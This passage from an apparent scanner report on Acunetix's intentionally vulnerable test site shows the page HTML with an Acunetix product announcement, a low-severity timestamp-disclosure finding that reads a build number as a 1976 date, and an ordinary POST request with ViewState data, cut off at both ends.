xsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+dfic04fJFrwdgOeBd3JBjK63E5g==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          190515149
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        3. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          190515149, which evaluates to: 1976-01-15 08:52:29

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Content-Length: 6543
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (6543 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA%2BPHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc%2BICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8%2BbmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A%2BICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A%2BICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A%2BICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA%2BLSBTdXBwb3J0IGZvciBJUHY2PGJyIC8%2BICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8%2BICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8%2BICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJ